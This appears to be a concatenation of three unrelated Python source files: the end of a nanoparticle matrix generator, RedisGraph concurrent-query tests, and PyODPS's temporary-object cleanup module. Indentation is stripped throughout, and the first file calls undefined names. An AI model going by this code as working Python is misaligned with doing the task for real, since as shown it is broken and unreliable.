if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
##################################################################################################################################
### função que descreve a compactação
def compac(A,Dx1,Dy1,Dz1,zini,zfin,yini,yfin,xini,xfin):
# print (A)
print(A[21][14],"aqui agora")
fileemp=open('/home/vagner/Desktop/GREAT_REFS/MEISMATHEMATICA/shay/matrizpython/marmittexamples/ajudamarmitt/parallelmtxgen/emp.mtx','w')
fileemp.write(str(Dx1)+ ' ')
fileemp.write(str(Dy1)+ ' ')
fileemp.write(str(Dz1)+ '\n')
print(A[1][1],A[2][1],A[3][1],A[4][1],A[5][1],A[6][1],A[7][1],A[21][14],'first matrix element')
iCp_old = A[0][0]
c = 0
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
iCp = A[i][j+(k-1)*Dy1]
if iCp == iCp_old:
c += 1
# print(A[21][14],"aqui agora porra")
if c == 50000:
print(c, iCp_old, file=fileemp)
c = 1
iCp_old = A[i][j+(k-1)*Dy1]
else:
print(c, iCp_old, file=fileemp)
iCp_old = iCp
c = 1
# print("veio ate aqui!!!!")
if (i==Dx1 and j==Dy1 and k==Dz1):
print(c,iCp_old, file=fileemp)
###########################################################################################################################
# Descreve as dimensões da matriz a ser criada, juntamente com seus parâmetros
# parâmetros que serão dados pelo usuário
#if ( Npix > Npiy):
# Nmaior=Npix
# Nmenor=Npiy
#elif(Npix <= Npiy):
# Nmaior=Npiy
# Nmenor=Npix
# print(1)
def mtxgen(Npix, Npiy,Ntam,dl,cs,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum,escolha,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,rcarbonpt,radiuspt,rcarbonpd,radiuspd,distcentro,alloynumber):
# Npix=3
# Npiy=3
# Ntam=3
# dl=5.0
#alloytudo= (input('Alloy de PtPd em tudo? ("s" OR "n") '))
#cascaptpd= (input('Casca de PtPd ("s" OR "n") '))
#core= (input('PT-core OR PD-core("pt" OR "pd") '))
#cs=10.0
#if(alloytudo =='s'):
# [radiusptpd,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum]= estruturas(alloytudo,cascaptpd,core,cs,dl)
#if(alloytudo == 'n' and cascaptpd =='n' and (core =='pd' or core == 'pt')):
# [radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum] = estruturas(alloytudo,cascaptpd,core,cs,dl)
#[radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum]
if(escolha=='hexmono' or escolha== 'hexpy'):
Npix=Npix*2
Npiy=Npiy*2-1
print('sim')
# if(escolha != 'triplate'):
if(escolha != 'interpene'):
print(Npix,Npiy)
dx=Npix*2*radiusc
dy=Npix*2*radiusc
dz=Ntam*2*radiusc
Dx1=int(dx/dl)
Dy1=int(dy/dl)
Dz1=int(dz/dl)
elif(escolha=='interpene'):
dx=radiuspt+radiuspd+(rcarbonpt-radiuspt)+(rcarbonpd-radiuspd)+10+distcentro
if (radiuspt>=radiuspd):
dy=2*(rcarbonpt)+distcentro
# dz=2*radiuspt+2*(rcarbonpt-radiuspt)
dz=dy
dx=dy
radiusc= rcarbonpt+distcento
if (radiuspd>radiuspt):
dy=2*(rcarbonpd)+distcentro
# dz=2*radiuspd+2*(rcarbonpd-radiuspd)
dz=dy
dx=dy
radiusc= rcarbonpt+distcento
# elif (escolha=='triplate')
### chamar a função que zera a matriz
#zeromatrix(Dy1,Dy1,Dz1,A)
#!!!
A = zeromatrix(Dx1, Dy1, Dz1)
#!!!
# print(1)
Npixn=Dx1
Npiyn=Dy1
Ntamn=Dz1
xini=1
yini=1
zini=1
xfin=int(Npixn)#+1)
yfin=int(Npiyn)#+1)
zfin=int(Ntamn)#+1)
## zera-se o array que será utilizado
#zeroarray(Nmaior,Nmenor)
#!!!
[x, y, z, Npart] = zeroarray(Npix,Npiy,Ntam)
# escolha da geomtria
#!!!
# escolha = 'py'
if (escolha == 'jonder1'):
A=jonderstruct1 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs)
if (escolha == 'jonder2'):
A=jonderstruct2 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs)
if (escolha == 'tri'):
# if(alloytudo =='s'):
# [radiusptpd,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum]= estruturas(alloytudo,cascaptpd,core,cs,dl)
A=triangular (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'rectangular'):
# if __name__ == '__main__':
# pool = Pool(processes=4) # process per core
# pool.map(rectangular,) # proces data_inp
# return print(1)
# processes=[]
# p = Process(target=rectangular, args=(xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs))
# p.start()
# processes.append(p)
# print('aqui')
# for p in processes:
# p.join()
A= rectangular(xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs)
if (escolha == 'column'):
A=columnpiling (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs)
if (escolha == 'pygen'):
# if(alloytudo =='s'):
# [radiusptpd,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum]= estruturas(alloytudo,cascaptpd,core,cs,dl)
# processes=[]
# p = Process(target=pygeneral, args=((xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs,rcarbonpt,radiuspt,rcarbonpd,radiuspd,distcentro,alloynumber)))
# p.start()
# processes.append(p)
# print('aqui')
for p in processes:
p.join()
A=pygeneral (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs,rcarbonpt,radiuspt,rcarbonpd,radiuspd,distcentro,alloynumber)
# !!!
if (escolha == 'hexmono'):
# if(alloytudo =='s'):
# [radiusptpd,radiusc,radiuscore,radiusshell,corenumber,shellnumber,cnum]= estruturas(alloytudo,cascaptpd,core,cs,dl)
A=hexmono (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
# !!!
if (escolha == 'hexpy'):
A=hexpyramid (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex1'):
A=hex1 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex2'):
A=hex2 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex3'):
A=hex3 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex4'):
A=hex4 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex5'):
A=hex5 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex6'):
A=hex6 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex7'):
A=hex7 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex8'):
A=hex8 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'hex9'):
A=hex9 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (escolha == 'trifcc2in2'):
A=triangularfcc2in2 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,cs,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
# pygeneral (m, ...)
# !!!
# print(A)
return A,Dx1,Dy1,Dz1,zini,zfin,yini,yfin,xini,xfin
###########################################################################################################################
###########################################################################################################################
|
test_concurrent_query.py
|
import os
import sys
import threading
from RLTest import Env
from redisgraph import Graph, Node, Edge
from redis import ResponseError
from base import FlowTestsBase
GRAPH_ID = "G" # Graph identifier.
CLIENT_COUNT = 16 # Number of concurrent connections.
graphs = None # One graph object per client.
assertions = [True] * CLIENT_COUNT # Each thread places its verdict at position threadID.
exceptions = [None] * CLIENT_COUNT # Each thread which fails sets its exception content ar position threadID.
people = ["Roi", "Alon", "Ailon", "Boaz", "Tal", "Omri", "Ori"]
def query_aggregate(graph, query, threadID):
global assertions
assertions[threadID] = True
for i in range(10):
actual_result = graph.query(query)
person_count = actual_result.result_set[0][0]
if person_count != len(people):
assertions[threadID] = False
break
def query_neighbors(graph, query, threadID):
global assertions
assertions[threadID] = True
# Fully connected graph + header row.
expected_resultset_size = len(people) * (len(people)-1)
for i in range(10):
actual_result = graph.query(query)
if len(actual_result.result_set) is not expected_resultset_size:
assertions[threadID] = False
break
def query_write(graph, query, threadID):
global assertions
assertions[threadID] = True
for i in range(10):
actual_result = graph.query(query)
if actual_result.nodes_created != 1 or actual_result.properties_set != 1:
assertions[threadID] = False
break
def thread_run_query(graph, query, threadID):
global assertions
try:
assertions[threadID] = graph.query(query)
except ResponseError as e:
exceptions[threadID] = str(e)
def delete_graph(graph, threadID):
global assertions
assertions[threadID] = True
# Try to delete graph.
try:
graph.delete()
except:
# Graph deletion failed.
assertions[threadID] = False
class testConcurrentQueryFlow(FlowTestsBase):
def __init__(self):
self.env = Env(decodeResponses=True)
global graphs
graphs = []
for i in range(0, CLIENT_COUNT):
redis_con = self.env.getConnection()
graphs.append(Graph(GRAPH_ID, redis_con))
self.populate_graph()
def populate_graph(self):
nodes = {}
graph = graphs[0]
# Create entities
for p in people:
node = Node(label="person", properties={"name": p})
graph.add_node(node)
nodes[p] = node
# Fully connected graph
for src in nodes:
for dest in nodes:
if src != dest:
edge = Edge(nodes[src], "know", nodes[dest])
graph.add_edge(edge)
graph.commit()
# Count number of nodes in the graph
def test01_concurrent_aggregation(self):
q = """MATCH (p:person) RETURN count(p)"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=query_aggregate, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
self.env.assertTrue(assertions[i])
# Concurrently get neighbors of every node.
def test02_retrieve_neighbors(self):
q = """MATCH (p:person)-[know]->(n:person) RETURN n.name"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=query_neighbors, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
self.env.assertTrue(assertions[i])
# Concurrent writes
def test_03_concurrent_write(self):
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
q = """CREATE (c:country {id:"%d"})""" % i
t = threading.Thread(target=query_write, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
self.env.assertTrue(assertions[i])
# Try to delete graph multiple times.
def test_04_concurrent_delete(self):
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=delete_graph, args=(graph, i))
t.setDaemon(True)
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
# Exactly one thread should have successfully deleted the graph.
self.env.assertEquals(assertions.count(True), 1)
# Try to delete a graph while multiple queries are executing.
def test_05_concurrent_read_delete(self):
redis_con = self.env.getConnection()
##############################################################################################
# Delete graph via Redis DEL key.
##############################################################################################
self.populate_graph()
q = """UNWIND (range(0, 10000)) AS x WITH x AS x WHERE (x / 900) = 1 RETURN x"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=thread_run_query, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
redis_con.delete(GRAPH_ID)
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
self.env.assertEquals(assertions[i].result_set[0][0], 900)
# Make sure Graph is empty, e.g. graph was deleted.
resultset = graphs[0].query("MATCH (n) RETURN count(n)").result_set
self.env.assertEquals(resultset[0][0], 0)
##############################################################################################
# Delete graph via Redis FLUSHALL.
##############################################################################################
self.populate_graph()
q = """UNWIND (range(0, 10000)) AS x WITH x AS x WHERE (x / 900) = 1 RETURN x"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=thread_run_query, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
redis_con.flushall()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
self.env.assertEquals(assertions[i].result_set[0][0], 900)
# Make sure Graph is empty, e.g. graph was deleted.
resultset = graphs[0].query("MATCH (n) RETURN count(n)").result_set
self.env.assertEquals(resultset[0][0], 0)
##############################################################################################
# Delete graph via GRAPH.DELETE.
##############################################################################################
self.populate_graph()
q = """UNWIND (range(0, 10000)) AS x WITH x AS x WHERE (x / 900) = 1 RETURN x"""
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=thread_run_query, args=(graph, q, i))
t.setDaemon(True)
threads.append(t)
t.start()
graphs[i].delete()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
self.env.assertEquals(assertions[i].result_set[0][0], 900)
# Make sure Graph is empty, e.g. graph was deleted.
resultset = graphs[0].query("MATCH (n) RETURN count(n)").result_set
self.env.assertEquals(resultset[0][0], 0)
def test_06_concurrent_write_delete(self):
# Test setup - validate that graph exists and possible results are None
graphs[0].query("MATCH (n) RETURN n")
assertions[0] = None
exceptions[0] = None
redis_con = self.env.getConnection()
heavy_write_query = """UNWIND(range(0,999999)) as x CREATE(n)"""
writer = threading.Thread(target=thread_run_query, args=(graphs[0], heavy_write_query, 0))
writer.setDaemon(True)
writer.start()
redis_con.delete(GRAPH_ID)
writer.join()
possible_exceptions = ["Encountered different graph value when opened key " + GRAPH_ID,
"Encountered an empty key when opened key " + GRAPH_ID]
if exceptions[0] is not None:
self.env.assertContains(exceptions[0], possible_exceptions)
else:
self.env.assertEquals(1000000, assertions[0].nodes_created)
def test_07_concurrent_write_rename(self):
# Test setup - validate that graph exists and possible results are None
graphs[0].query("MATCH (n) RETURN n")
assertions[0] = None
exceptions[0] = None
redis_con = self.env.getConnection()
new_graph = GRAPH_ID + "2"
# Create new empty graph with id GRAPH_ID + "2"
redis_con.execute_command("GRAPH.QUERY",new_graph, """MATCH (n) return n""", "--compact")
heavy_write_query = """UNWIND(range(0,999999)) as x CREATE(n)"""
writer = threading.Thread(target=thread_run_query, args=(graphs[0], heavy_write_query, 0))
writer.setDaemon(True)
writer.start()
redis_con.rename(new_graph, GRAPH_ID)
writer.join()
# Possible scenarios:
# 1. Rename is done before query is sent. The name in the graph context is new_graph, so when upon commit, when trying to open new_graph key, it will encounter an empty key since new_graph is not a valid key.
# Note: As from https://github.com/RedisGraph/RedisGraph/pull/820 this may not be valid since the rename event handler might actually rename the graph key, before the query execution.
# 2. Rename is done during query executing, so when commiting and comparing stored graph context name (GRAPH_ID) to the retrived value graph context name (new_graph), the identifiers are not the same, since new_graph value is now stored at GRAPH_ID value.
possible_exceptions = ["Encountered different graph value when opened key " + GRAPH_ID,
"Encountered an empty key when opened key " + new_graph]
if exceptions[0] is not None:
self.env.assertContains(exceptions[0], possible_exceptions)
else:
self.env.assertEquals(1000000, assertions[0].nodes_created)
def test_08_concurrent_write_replace(self):
# Test setup - validate that graph exists and possible results are None
graphs[0].query("MATCH (n) RETURN n")
assertions[0] = None
exceptions[0] = None
redis_con = self.env.getConnection()
heavy_write_query = """UNWIND(range(0,999999)) as x CREATE(n)"""
writer = threading.Thread(target=thread_run_query, args=(graphs[0], heavy_write_query, 0))
writer.setDaemon(True)
writer.start()
set_result = redis_con.set(GRAPH_ID, "1")
writer.join()
possible_exceptions = ["Encountered a non-graph value type when opened key " + GRAPH_ID,
"WRONGTYPE Operation against a key holding the wrong kind of value"]
if exceptions[0] is not None:
# If the SET command attempted to execute while the CREATE query was running,
# an exception should have been issued.
self.env.assertContains(exceptions[0], possible_exceptions)
else:
# Otherwise, both the CREATE query and the SET command should have succeeded.
self.env.assertEquals(1000000, assertions[0].nodes_created)
self.env.assertEquals(set_result, True)
def test_09_concurrent_multiple_readers_after_big_write(self):
# Test issue #890
global assertions
global exceptions
redis_con = self.env.getConnection()
redis_graph = Graph("G890", redis_con)
redis_graph.query("""UNWIND(range(0,999)) as x CREATE()-[:R]->()""")
read_query = """MATCH (n)-[r:R]->(m) RETURN n, r, m"""
assertions = [True] * CLIENT_COUNT
exceptions = [None] * CLIENT_COUNT
threads = []
for i in range(CLIENT_COUNT):
t = threading.Thread(target=thread_run_query, args=(redis_graph, read_query, i))
t.setDaemon(True)
threads.append(t)
t.start()
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
for i in range(CLIENT_COUNT):
self.env.assertIsNone(exceptions[i])
self.env.assertEquals(1000, len(assertions[i].result_set))
|
tempobj.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import copy
import glob
import hashlib
import json
import os
import platform
import subprocess
import sys
import tempfile
import stat
import threading
import time
import uuid
from .compat import PY26, pickle, six, builtins, futures
from .config import options
from .errors import NoSuchObject
from . import utils
from .accounts import AliyunAccount
TEMP_ROOT = utils.build_pyodps_dir('tempobjs')
SESSION_KEY = '%d_%s' % (int(time.time()), uuid.uuid4())
CLEANER_THREADS = 100
USER_FILE_RIGHTS = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR
CLEANUP_SCRIPT_TMPL = u"""
#-*- coding:utf-8 -*-
import os
import sys
import json
try:
os.unlink(os.path.realpath(__file__))
except Exception:
pass
temp_codes = json.loads({odps_info!r})
import_paths = json.loads({import_paths!r})
biz_ids = json.loads({biz_ids!r})
if sys.version_info[0] < 3:
if sys.platform == 'win32':
import_paths = [p.encode('mbcs') for p in import_paths]
else:
import_paths = [p.encode() for p in import_paths]
normed_paths = set(os.path.normcase(os.path.normpath(p)) for p in sys.path)
import_paths = [p for p in import_paths
if os.path.normcase(os.path.normpath(p)) not in normed_paths]
sys.path.extend(import_paths)
from odps import ODPS, tempobj
if os.environ.get('WAIT_CLEANUP') == '1':
tempobj.cleanup_timeout = None
else:
tempobj.cleanup_timeout = 5
tempobj.cleanup_mode = True
tempobj.host_pid = {host_pid}
tempobj.ObjectRepositoryLib.biz_ids = set(biz_ids)
for o_desc in temp_codes:
ODPS(**tempobj.compat_kwargs(o_desc))
os._exit(0)
""".lstrip()
cleanup_mode = False
cleanup_timeout = 0
host_pid = os.getpid()
class ExecutionEnv(object):
def __init__(self, **kwargs):
self.cleaned = False
self.os = os
self.sys = sys
self._g_env = copy.copy(globals())
self.is_windows = 'windows' in platform.platform().lower()
self.pid = os.getpid()
self.os_sep = os.sep
self.executable = sys.executable
self.six = six
import_paths = copy.deepcopy(sys.path)
package_root = os.path.dirname(__file__)
if package_root not in import_paths:
import_paths.append(package_root)
self.import_path_json = utils.to_text(json.dumps(import_paths, ensure_ascii=False))
self.builtins = builtins
self.io = __import__('io', fromlist=[''])
if six.PY3:
self.conv_bytes = (lambda s: s.encode() if isinstance(s, str) else s)
self.conv_unicode = (lambda s: s if isinstance(s, str) else s.decode())
else:
self.conv_bytes = (lambda s: s.encode() if isinstance(s, unicode) else s)
self.conv_unicode = (lambda s: s if isinstance(s, unicode) else s.decode())
self.subprocess = subprocess
self.temp_dir = tempfile.gettempdir()
self.template = CLEANUP_SCRIPT_TMPL
self.file_right = USER_FILE_RIGHTS
self.is_main_process = utils.is_main_process()
for k, v in six.iteritems(kwargs):
setattr(self, k, v)
class TempObject(object):
__slots__ = []
_type = ''
_priority = 0
def __init__(self, *args, **kwargs):
for k, v in zip(self.__slots__, args):
setattr(self, k, v)
for k in self.__slots__:
if hasattr(self, k):
continue
setattr(self, k, kwargs.get(k))
def __hash__(self):
if self.__slots__:
return hash(tuple(getattr(self, k) for k in self.__slots__))
return super(TempObject, self).__hash__()
def __eq__(self, other):
if not isinstance(other, TempObject):
return False
if self._type != other._type:
return False
return all(getattr(self, k) == getattr(other, k) for k in self.__slots__)
def __ne__(self, other):
return not self.__eq__(other)
def __getstate__(self):
return dict((slot, getattr(self, slot)) for slot in self.__slots__ if hasattr(self, slot))
def __setstate__(self, state):
for slot, value in state.items():
setattr(self, slot, value)
class TempTable(TempObject):
__slots__ = 'table', 'project'
_type = 'Table'
def drop(self, odps):
odps.run_sql('drop table if exists %s' % self.table, project=self.project)
class TempModel(TempObject):
__slots__ = 'model', 'project'
_type = 'OfflineModel'
def drop(self, odps):
try:
odps.delete_offline_model(self.model, self.project)
except NoSuchObject:
pass
class TempFunction(TempObject):
__slots__ = 'function', 'project'
_type = 'Function'
_priority = 1
def drop(self, odps):
try:
odps.delete_function(self.function, self.project)
except NoSuchObject:
pass
class TempResource(TempObject):
__slots__ = 'resource', 'project'
_type = 'Resource'
def drop(self, odps):
try:
odps.delete_resource(self.resource, self.project)
except NoSuchObject:
pass
class TempVolumePartition(TempObject):
__slots__ = 'volume', 'partition', 'project'
_type = 'VolumePartition'
def drop(self, odps):
try:
odps.delete_volume_partition(self.volume, self.partition, self.project)
except NoSuchObject:
pass
class ObjectRepository(object):
def __init__(self, file_name):
self._container = set()
self._file_name = file_name
if file_name and os.path.exists(file_name):
self.load()
def put(self, obj, dump=True):
self._container.add(obj)
if dump:
self.dump()
def cleanup(self, odps, use_threads=True):
cleaned = []
def _cleaner(obj):
try:
obj.drop(odps)
cleaned.append(obj)
except:
pass
if self._container:
if use_threads:
pool = futures.ThreadPoolExecutor(CLEANER_THREADS)
list(pool.map(_cleaner, reversed(list(self._container))))
else:
for o in sorted(list(self._container), key=lambda ro: type(ro)._priority, reverse=True):
_cleaner(o)
for obj in cleaned:
if obj in self._container:
self._container.remove(obj)
if not self._container and self._file_name:
try:
os.unlink(self._file_name)
except OSError:
pass
else:
self.dump()
def dump(self):
if self._file_name is None:
return
try:
with open(self._file_name, 'wb') as outf:
pickle.dump(list(self._container), outf, protocol=0)
outf.close()
except OSError:
return
os.chmod(self._file_name, USER_FILE_RIGHTS)
def load(self):
try:
with open(self._file_name, 'rb') as inpf:
contents = pickle.load(inpf)
self._container.update(contents)
except (EOFError, OSError):
pass
class ObjectRepositoryLib(dict):
biz_ids = set([options.biz_id, ]) if options.biz_id else set(['default', ])
odps_info = dict()
biz_ids_json = json.dumps(list(biz_ids))
odps_info_json = json.dumps([v for v in six.itervalues(odps_info)])
def __init__(self, *args, **kwargs):
super(ObjectRepositoryLib, self).__init__(*args, **kwargs)
self._env = ExecutionEnv()
def __del__(self):
self._exec_cleanup_script()
@classmethod
def add_biz_id(cls, biz_id):
cls.biz_ids.add(biz_id)
cls.biz_ids_json = json.dumps(list(cls.biz_ids))
@classmethod
def add_odps_info(cls, odps):
odps_key = _gen_repository_key(odps)
cls.odps_info[odps_key] = dict(
access_id=odps.account.access_id, secret_access_key=odps.account.secret_access_key,
project=odps.project, endpoint=odps.endpoint
)
cls.odps_info_json = json.dumps([v for v in six.itervalues(cls.odps_info)])
def _exec_cleanup_script(self):
global cleanup_mode
if not self:
return
env = self._env
if cleanup_mode or not env.is_main_process or env.cleaned:
return
env.cleaned = True
script = env.template.format(import_paths=env.import_path_json, odps_info=self.odps_info_json,
host_pid=env.pid, biz_ids=self.biz_ids_json)
script_name = env.temp_dir + env.os_sep + 'tmp_' + str(env.pid) + '_cleanup_script.py'
script_file = env.io.FileIO(script_name, 'w')
script_file.write(env.conv_bytes(script))
script_file.close()
try:
if env.is_windows:
env.os.chmod(script_name, env.file_right)
else:
env.subprocess.call(['chmod', oct(env.file_right).replace('o', ''), script_name])
except:
pass
kwargs = dict(close_fds=True)
if env.is_windows:
si = subprocess.STARTUPINFO()
si.dwFlags |= subprocess.STARTF_USESHOWWINDOW
kwargs['startupinfo'] = si
env.subprocess.call([env.executable, script_name], **kwargs)
_cleaned_keys = set()
_obj_repos = ObjectRepositoryLib() # this line should be put last due to initialization dependency
atexit.register(_obj_repos._exec_cleanup_script)
def _is_pid_running(pid):
if 'windows' in platform.platform().lower():
task_lines = os.popen('TASKLIST /FI "PID eq {0}" /NH'.format(pid)).read().strip().splitlines()
if not task_lines:
return False
return str(pid) in set(task_lines[0].split())
else:
try:
os.kill(pid, 0)
return True
except OSError:
return False
def clean_objects(odps, biz_ids=None):
odps_key = _gen_repository_key(odps)
files = []
biz_ids = biz_ids or _obj_repos.biz_ids
